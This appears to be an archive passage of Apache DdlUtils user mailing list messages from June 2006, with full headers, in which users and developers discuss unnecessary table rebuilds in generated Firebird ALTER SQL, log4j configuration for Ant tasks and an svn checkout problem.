DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=FgNPap2/EGnffUPo16nhrDwxHaQJE3WyKhqdX3kO0LYGKe5GvitGVa+kQtGUFBnXtvAVYYyNVAA3za+U0GE+CyK27UZaSPsANxkBW0MdQfIjvPuWIbbgp9JCLOgBVesB8nuUvXSd8qhIJapfpFOHEM9TdDvQqLKOgYXujXsjgKw= Received: by 161.129.204.104 with SMTP id w13mr699942ugi; Wed, 14 Jun 2006 07:02:58 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 14 Jun 2006 07:02:58 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 14 Jun 2006 16:02:58 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Plataform.getAlterTablesSql results In-Reply-To: <003601c68fb2$cbc60220$0207a8c0@is1> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <003601c68fb2$cbc60220$0207a8c0@is1> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/14/06, Douglas Granzotto (Infoarte) <[email protected]> wrote: > I am using the following method: > String getAlterTablesSql(Database desiredDb, boolean doDrops, boolean modifyColumns, boolean continueOnError) > from Plataform > > It is returning this sql code: > ALTER TABLE IPI > ADD CLASSFISCAL VARCHAR(12); > > ALTER TABLE IPI > ALTER CLASSFISCAL POSITION 4; > > CREATE TABLE IPI_ > ( > IPICOD VARCHAR(2) NOT NULL, > IPIDESC VARCHAR(30), > TIPO INTEGER, > CLASSFISCAL VARCHAR(12), > VERSAO INTEGER, > PRIMARY KEY (IPICOD) > ); > > INSERT INTO IPI_ (CLASSFISCAL,IPICOD,IPIDESC,TIPO,VERSAO) SELECT CLASSFISCAL,IPICOD,IPIDESC,TIPO,VERSAO FROM IPI; > > DROP TABLE IPI; > > CREATE TABLE IPI > ( > IPICOD VARCHAR(2) NOT NULL, > IPIDESC VARCHAR(30), > TIPO INTEGER, > CLASSFISCAL VARCHAR(12), > VERSAO INTEGER, > PRIMARY KEY (IPICOD) > ); > > CREATE INDEX IX_IPI_1 ON IPI (IPIDESC); > > INSERT INTO IPI (IPICOD,IPIDESC,TIPO,CLASSFISCAL,VERSAO) SELECT IPICOD,IPIDESC,TIPO,CLASSFISCAL,VERSAO FROM IPI_; > > DROP TABLE IPI_; > > > > I believe that it would be necessary, only this: > ALTER TABLE IPI > ADD CLASSFISCAL VARCHAR(12); > > ALTER TABLE IPI > ALTER CLASSFISCAL POSITION 4; > > Since I only added a column. > I don't understand, why of the remaining of the code. > CREATE TABLE IPI_, INSERT INTO IPI_, > DROP TABLE IPI, etc This depends on what platform you use. Some databases fully support adding columns (e.g. MySQL), for some this can only be used under specific conditions, and for some, there is no way of adding the column except by re-creating the table as is done in the SQL that you posted. Tom From [email protected] Wed Jun 14 14:47:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24380 invoked from network); 14 Jun 2006 14:47:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 14:47:26 -0000 Received: (qmail 53707 invoked by uid 500); 14 Jun 2006 14:47:26 -0000 Delivered-To: [email protected] Received: (qmail 53681 invoked by uid 500); 14 Jun 2006 14:47:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53670 invoked by uid 99); 14 Jun 2006 14:47:25 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 07:47:25 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO smtp3.matrix.com.br) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 07:47:24 -0700 Received: from portalbl1.matrix.net.br (unknown [161.129.204.104]) by smtp3.matrix.com.br (Postfix) with SMTP id C1512180634 for <[email protected]>; Wed, 14 Jun 2006 10:02:18 -0300 (BRT) Received: (qmail 6624 invoked from network); 14 Jun 2006 14:47:03 -0000 Received: from unknown (HELO is1) ([email protected]@[161.129.204.104]) (envelope-sender <[email protected]>) by portalbl1.matrix.net.br (qmail-ldap-1.03) with SMTP for <[email protected]>; 14 Jun 2006 14:47:03 -0000 Message-ID: <003e01c68fc1$66026190$0207a8c0@is1> From: "Douglas Granzotto (Infoarte)" <[email protected]> To: <[email protected]> References: <003601c68fb2$cbc60220$0207a8c0@is1> <[email protected]> Subject: Re: Plataform.getAlterTablesSql results Date: Wed, 14 Jun 2006 11:47:01 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N > > This depends on what platform you use. Some databases fully support > adding columns (e.g. MySQL), for some this can only be used under > specific conditions, and for some, there is no way of adding the > column except by re-creating the table as is done in the SQL that you > posted. > > Tom > I am using Firebird 1.5, and this supports add column. So much that I removed the unnecessary commands, only remaining: > ALTER TABLE IPI > ADD CLASSFISCAL VARCHAR(12); > > ALTER TABLE IPI > ALTER CLASSFISCAL POSITION 4; And that's ran ok, the modification was executed with success. Douglas From [email protected] Wed Jun 14 15:01:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30707 invoked from network); 14 Jun 2006 15:01:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 15:01:17 -0000 Received: (qmail 73437 invoked by uid 500); 14 Jun 2006 15:01:17 -0000 Delivered-To: [email protected] Received: (qmail 73415 invoked by uid 500); 14 Jun 2006 15:01:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73404 invoked by uid 99); 14 Jun 2006 15:01:17 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 08:01:17 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 08:01:16 -0700 Received: by ug-out-1314.google.com with SMTP id m3so362304uge for <[email protected]>; Wed, 14 Jun 2006 08:00:55 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=bcDkp0Ih8+eJRW0jyoTKwah41YHnoOqCzuAF0wh14CtxemuJubh4RvX/rvpYAplgHEAt1zpe//xP6jdnZSC9rl4yfBJn5JQOvSZ3K8IP6JC7aup2tmrmdJXIRkzmH4h5HAzu+XSLlxZRLLnFpmm/FdOe7DAAN+rIw/rJrZQ3PKw= Received: by 161.129.204.104 with SMTP id z7mr752454ugl; Wed, 14 Jun 2006 08:00:54 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 14 Jun 2006 08:00:54 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 14 Jun 2006 17:00:54 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Plataform.getAlterTablesSql results In-Reply-To: <003e01c68fc1$66026190$0207a8c0@is1> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <003601c68fb2$cbc60220$0207a8c0@is1> <[email protected]> <003e01c68fc1$66026190$0207a8c0@is1> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/14/06, Douglas Granzotto (Infoarte) <[email protected]> wrote: > I am using Firebird 1.5, and this supports add column. > So much that I removed the unnecessary commands, > only remaining: > > > ALTER TABLE IPI > > ADD CLASSFISCAL VARCHAR(12); > > > > ALTER TABLE IPI > > ALTER CLASSFISCAL POSITION 4; > > And that's ran ok, the modification was executed with success. Are you sure that you're using the latest DdlUtils source ? I've added support for Firebird specific statements about two weeks ago: http://svn.apache.org/viewvc/db/ddlutils/trunk/src/java/org/apache/ddlutils/platform/firebird/FirebirdBuilder.java?view=markup (in method processChange(Database, Database, AddColumnChange)). Tom From [email protected] Wed Jun 14 16:49:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18720 invoked from network); 14 Jun 2006 16:49:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 16:49:19 -0000 Received: (qmail 98428 invoked by uid 500); 14 Jun 2006 16:49:19 -0000 Delivered-To: [email protected] Received: (qmail 98337 invoked by uid 500); 14 Jun 2006 16:49:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98320 invoked by uid 99); 14 Jun 2006 16:49:18 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 09:49:18 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=DNS_FROM_RFC_BOGUSMX X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO pd2mo3so.prod.shaw.ca) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 09:49:16 -0700 Received: from pd4mr4so.prod.shaw.ca (pd4mr4so-qfe3.prod.shaw.ca [161.129.204.104]) by l-daemon (Sun ONE Messaging Server 6.0 HotFix 1.01 (built Mar 15 2004)) with ESMTP id <0J0V00CFK00UAZL0@l-daemon> for [email protected]; Wed, 14 Jun 2006 10:48:31 -0600 (MDT) Received: from pn2ml2so.prod.shaw.ca ([161.129.204.104]) by pd4mr4so.prod.shaw.ca (Sun ONE Messaging Server 6.0 HotFix 1.01 (built Mar 15 2004)) with ESMTP id <[email protected]> for [email protected]; Wed, 14 Jun 2006 10:42:55 -0600 (MDT) Received: from [161.129.204.104] ([161.129.204.104]) by l-daemon (Sun ONE Messaging Server 6.0 HotFix 1.01 (built Mar 15 2004)) with ESMTP id <0J0U0011TZRHR0K0@l-daemon> for [email protected]; Wed, 14 Jun 2006 10:42:54 -0600 (MDT) Date: Wed, 14 Jun 2006 10:43:46 -0600 From: Guy Davis <[email protected]> Subject: Configuring log4j for Ant when running DDLUtils tasks To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 Content-type: text/plain; charset=ISO-8859-1; format=flowed Content-transfer-encoding: 7bit X-Accept-Language: en-us, en User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi all, I was hoping that someone would have an idea as to how I can configure the log4j system so that DDLUtils log messages are output to the console when running Ant tasks. For example, here's the main portion of an Ant task labelled db.clean: <ddl_to_db schemaFile="${ddlutils.dir}/empty_schema.xml" databaseType="${db.type}" validateXml="false"> <database url="${db.url}" driverClassName="${db.driver}" username="${db.user}" password="${db.password}" /> <writeSchemaToDatabase alterDatabase="true" /> </ddl_to_db> Here's the command line output: $ ant -Ddb.props=database/ddlutils/oracle.properties db.clean [ddl_to_db] log4j:WARN No appenders could be found for logger org.apache.commons.digester.Digester). [ddl_to_db] log4j:WARN Please initialize the log4j system properly. This is important as it would give us clues as to why the Ant tasks fail for situtations like all the Oracle tablespace is used up etc... Thanks in advance, Guy From [email protected] Wed Jun 14 18:06:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88983 invoked from network); 14 Jun 2006 18:06:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 18:06:48 -0000 Received: (qmail 34252 invoked by uid 500); 14 Jun 2006 18:06:44 -0000 Delivered-To: [email protected] Received: (qmail 34195 invoked by uid 500); 14 Jun 2006 18:06:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34120 invoked by uid 99); 14 Jun 2006 18:06:43 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 11:06:43 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO smtp3.matrix.com.br) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 11:06:42 -0700 Received: from portalbl1.matrix.net.br (unknown [161.129.204.104]) by smtp3.matrix.com.br (Postfix) with SMTP id 9343017F481 for <[email protected]>; Wed, 14 Jun 2006 13:21:36 -0300 (BRT) Received: (qmail 22211 invoked from network); 14 Jun 2006 18:06:21 -0000 Received: from unknown (HELO is1) ([email protected]@[161.129.204.104]) (envelope-sender <[email protected]>) by portalbl1.matrix.net.br (qmail-ldap-1.03) with SMTP for <[email protected]>; 14 Jun 2006 18:06:21 -0000 Message-ID: <007401c68fdd$3d6e21d0$0207a8c0@is1> From: "Douglas Granzotto (Infoarte)" <[email protected]> To: <[email protected]> References: <003601c68fb2$cbc60220$0207a8c0@is1> <[email protected]> <003e01c68fc1$66026190$0207a8c0@is1> <[email protected]> Subject: Re: Plataform.getAlterTablesSql results Date: Wed, 14 Jun 2006 15:06:20 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ----- Original Message ----- From: "Thomas Dudziak" <[email protected]> To: <[email protected]> Sent: Wednesday, June 14, 2006 12:00 PM Subject: Re: Plataform.getAlterTablesSql results > On 6/14/06, Douglas Granzotto (Infoarte) <[email protected]> wrote: > > > I am using Firebird 1.5, and this supports add column. > > So much that I removed the unnecessary commands, > > only remaining: > > > > > ALTER TABLE IPI > > > ADD CLASSFISCAL VARCHAR(12); > > > > > > ALTER TABLE IPI > > > ALTER CLASSFISCAL POSITION 4; > > > > And that's ran ok, the modification was executed with success. > > Are you sure that you're using the latest DdlUtils source ? I've added > support for Firebird specific statements about two weeks ago: > > http://svn.apache.org/viewvc/db/ddlutils/trunk/src/java/org/apache/ddlutils/ platform/firebird/FirebirdBuilder.java?view=markup > > (in method processChange(Database, Database, AddColumnChange)). > > Tom > Yes, I got the sources on 06/08/2006. The FirebirdBuider.java class is ok. The script generated by plataform.getAlterTablesSql(Database desiredDb, boolean doDrops, boolean modifyColumns, boolean continueOnError) works well. The only problem are these lines, that I think are unnecessary. CREATE TABLE IPI_ ( IPICOD VARCHAR(2) NOT NULL, IPIDESC VARCHAR(30), TIPO INTEGER, CLASSFISCAL VARCHAR(12), VERSAO INTEGER, PRIMARY KEY (IPICOD) ); INSERT INTO IPI_ (CLASSFISCAL,IPICOD,IPIDESC,TIPO,VERSAO) SELECT CLASSFISCAL,IPICOD,IPIDESC,TIPO,VERSAO FROM IPI; DROP TABLE IPI; CREATE TABLE IPI ( IPICOD VARCHAR(2) NOT NULL, IPIDESC VARCHAR(30), TIPO INTEGER, CLASSFISCAL VARCHAR(12), VERSAO INTEGER, PRIMARY KEY (IPICOD) ); CREATE INDEX IX_IPI_1 ON IPI (IPIDESC); INSERT INTO IPI (IPICOD,IPIDESC,TIPO,CLASSFISCAL,VERSAO) SELECT IPICOD,IPIDESC,TIPO,CLASSFISCAL,VERSAO FROM IPI_; DROP TABLE IPI_; Douglas From [email protected] Wed Jun 14 20:51:45 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61909 invoked from network); 14 Jun 2006 20:51:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 20:51:45 -0000 Received: (qmail 34243 invoked by uid 500); 14 Jun 2006 20:51:45 -0000 Delivered-To: [email protected] Received: (qmail 34167 invoked by uid 500); 14 Jun 2006 20:51:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 10012 invoked by uid 99); 14 Jun 2006 17:55:37 -0000 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Message-ID: <{{EMAIL+SOCIAL_SECURITY_NUMBER}}> Date: Wed, 14 Jun 2006 12:55:15 -0500 (CDT) Subject: The tutorial on migrating DB to derby From: [email protected] To: [email protected] Cc: [email protected] User-Agent: SquirrelMail/1.4.3a-9.EL4 X-Mailer: SquirrelMail/1.4.3a-9.EL4 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 X-Priority: 3 (Normal) Importance: Normal Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, I was just going through the tutorial at http://db.apache.org/derby/integrate/db_ddlutils.html I am having a problem checking out the ddlutils files from http://svn.apache.org/repos/asf/db/ddlutils/trunk STEP 2. It says cannot connect to the server. My internet connection is perfect and I dont understand why it does not allow me to checkout stuff. Could you please help me out with this. Thanks, Kamna From [email protected] Wed Jun 14 20:56:51 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65939 invoked from network); 14 Jun 2006 20:56:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 20:56:51 -0000 Received: (qmail 41993 invoked by uid 500); 14 Jun 2006 20:56:51 -0000 Delivered-To: [email protected] Received: (qmail 41969 invoked by uid 500); 14 Jun 2006 20:56:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41954 invoked by uid 99); 14 Jun 2006 20:56:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 13:56:50 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ms-smtp-03.socal.rr.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 13:56:50 -0700 Received: from [161.129.204.104] (cpe-204-210-23-212.san.res.rr.com [161.129.204.104]) by ms-smtp-03.socal.rr.com (8.13.6/8.13.6) with ESMTP id k5EKuR1A009327 for <[email protected]>; Wed, 14 Jun 2006 13:56:28 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 14 Jun 2006 13:56:27 -0700 From: "Jean T. Anderson" <[email protected]> Reply-To: [email protected] User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc3 (X11/20050929) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: The tutorial on migrating DB to derby References: <{{EMAIL+SOCIAL_SECURITY_NUMBER}}> In-Reply-To: <{{EMAIL+SOCIAL_SECURITY_NUMBER}}> X-Enigmail-Version: 161.129.204.104 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Scanned: Symantec AntiVirus Scan Engine X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [email protected] wrote: > Hi, > I was just going through the tutorial at > http://db.apache.org/derby/integrate/db_ddlutils.html > > I am having a problem checking out the ddlutils files from > http://svn.apache.org/repos/asf/db/ddlutils/trunk STEP 2. > > It says cannot connect to the server. My internet connection is perfect > and I dont understand why it does not allow me to checkout stuff. > > Could you please help me out with this. > > Thanks, > Kamna Below is the response I posted to derby-user. -jean -------- Included Message -------- Subject: Re: The tutorial on migrating DB to derby Date: Wed, 14 Jun 2006 11:09:52 -0700 From: Jean T. Anderson <[email protected]> Reply-To: Derby Discussion <[email protected]>, [email protected] To: Derby Discussion <[email protected]> References: <{{EMAIL+SOCIAL_SECURITY_NUMBER}}> [email protected] wrote: > Hi, > I was just going through the tutorial at > http://db.apache.org/derby/integrate/db_ddlutils.html > > I am having a problem checking out the ddlutils files from > http://svn.apache.org/repos/asf/db/ddlutils/trunk STEP 2. > > It says cannot connect to the server. My internet connection is perfect > and I dont understand why it does not allow me to checkout stuff. > > Could you please help me out with this. > hmmm, I just tried and it worked for me. Try https instead: svn co https://svn.apache.org/repos/asf/db/ddlutils/trunk ddlutils Also, can you access this URL in your browser? https://svn.apache.org/repos/asf/db/ddlutils/trunk regards, -jean From [email protected] Wed Jun 14 22:24:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50335 invoked from network); 14 Jun 2006 22:24:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 22:24:19 -0000 Received: (qmail 47748 invoked by uid 500); 14 Jun 2006 22:24:19 -0000 Delivered-To: [email protected] Received: (qmail 47724 invoked by uid 500); 14 Jun 2006 22:24:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47707 invoked by uid 99); 14 Jun 2006 22:24:18 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 15:24:18 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 15:24:18 -0700 Received: by ug-out-1314.google.com with SMTP id m3so604666uge for <[email protected]>; Wed, 14 Jun 2006 15:23:56 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Yyk8+1+nDLL+M2HUO6wd6DpvFets7ByYc6SRA9kXx8jMS8+oF7W2chAgJNrxnyfGDSPARywBPkx2ynYG8GMqufsr5S23c5MxJs3PeReQhwg0DaQBiSmZCPXMUzAdSFbfTf/jYsZMT70Oi3T3q/zKZkPfBOt/Hrf/vtVx9nie438= Received: by 161.129.204.104 with SMTP id w13mr1111829ugi; Wed, 14 Jun 2006 15:23:55 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 14 Jun 2006 15:23:55 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 15 Jun 2006 00:23:55 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Plataform.getAlterTablesSql results In-Reply-To: <007401c68fdd$3d6e21d0$0207a8c0@is1> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <003601c68fb2$cbc60220$0207a8c0@is1> <[email protected]> <003e01c68fc1$66026190$0207a8c0@is1> <[email protected]> <007401c68fdd$3d6e21d0$0207a8c0@is1> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/14/06, Douglas Granzotto (Infoarte) <[email protected]> wrote: > Yes, I got the sources on 06/08/2006. > The FirebirdBuider.java class is ok. > The script generated by plataform.getAlterTablesSql(Database desiredDb, > boolean doDrops, boolean modifyColumns, boolean continueOnError) works > well. > The only problem are these lines, that I think are unnecessary. DdlUtils will rebuild the table if the changes cannot be done via specific SQL commands. In your case, I guess that DdlUtils detected not only the column addition but also another change that cannot be handled via a specific SQL statement. Since the generated SQL does not contain the original table definition, its hard to say what the change was that lead to the full table rebuild. Could you perhaps post the SQL for creating the original table ? Tom From [email protected] Wed Jun 14 22:44:33 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54523 invoked from network); 14 Jun 2006 22:44:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 22:44:33 -0000 Received: (qmail 69110 invoked by uid 500); 14 Jun 2006 22:44:33 -0000 Delivered-To: [email protected] Received: (qmail 69087 invoked by uid 500); 14 Jun 2006 22:44:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69076 invoked by uid 99); 14 Jun 2006 22:44:33 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 15:44:33 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 15:44:32 -0700 Received: by ug-out-1314.google.com with SMTP id m3so614448uge for <[email protected]>; Wed, 14 Jun 2006 15:44:11 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=KW4X/wG3s2q4yfHRp03v29QEGkGCspuiQ9jpTan9b5RbpJdDK/yi6nI/Pd/l6W2QAjNhkbImWjDXtRWm/KlfLkmhQUubhgk83xHcW6QGKvSuX1nnEPBIGXxkEEAPsFHKpxcmgt2nasrXF7zMuG7hqm4j9guazISwRYDHMp2KuO4= Received: by 161.129.204.104 with SMTP id y14mr1119786ugl; Wed, 14 Jun 2006 15:44:11 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 14 Jun 2006 15:44:11 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 15 Jun 2006 00:44:11 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Configuring log4j for Ant when running DDLUtils tasks In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/14/06, Guy Davis <[email protected]> wrote: > I was hoping that someone would have an idea as to how I can configure > the log4j system so that DDLUtils log messages are output to the console > when running Ant tasks. > > For example, here's the main portion of an Ant task labelled db.clean: > > <ddl_to_db schemaFile="${ddlutils.dir}/empty_schema.xml" > databaseType="${db.type}" validateXml="false"> > <database url="${db.url}" driverClassName="${db.driver}" > username="${db.user}" password="${db.password}" /> > <writeSchemaToDatabase alterDatabase="true" /> > </ddl_to_db> > > Here's the command line output: > $ ant 